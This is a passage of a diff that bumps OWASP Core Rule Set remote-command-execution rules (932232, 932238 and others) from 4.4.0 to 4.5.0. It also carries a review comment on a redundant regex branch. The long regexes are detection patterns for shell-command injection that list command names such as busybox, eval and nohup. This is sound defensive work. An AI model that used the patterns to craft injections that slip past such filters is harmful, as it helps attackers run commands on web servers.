*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-
0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*
)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))\b" \ "id:932232,\ phase:2,\ block,\ @@ -653,7 +653,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" 
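Review bot: The variable-assignment prefix in the new 932232 pattern (L124) contains `\$(?:.*|.*)`, an alternation whose two branches are identical; it is carried over from the removed line (L121) and recurs in 932239 (L116), so it looks like an artifact of regex-assembly generation rather than something this vendoring commit introduced. If a character after `$` (such as `(` or `{`) was dropped during generation the branch is wider than intended; if it is merely redundant it at worst doubles the backtracking on that branch for every cookie, argument and XML node inspected at PL3. Worth checking against the upstream regex-assembly source for 932232 and reporting there, since a hand edit of this generated line would be lost on the next sync. The only functional change I can see in the hunk is the `$[` form added to the separator group, `\$(?:\(\(?|[\[\{])`, which the vendored regression tests for 932232 should exercise if they are updated alongside this file. The 932232 directive starts at L122 and its action list continues past this hunk.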
@@ -673,11 +673,11 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[arx] tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\
-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*
(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx 
(?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#
\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_
a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))" \ "id:932238,\ phase:2,\ block,\ @@ -693,7 +693,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -713,7 +713,7 @@ SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -731,7 +731,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/137/134',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" 
@@ -749,7 +749,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/137/134',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -767,7 +767,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/137/134',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -786,10 +786,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
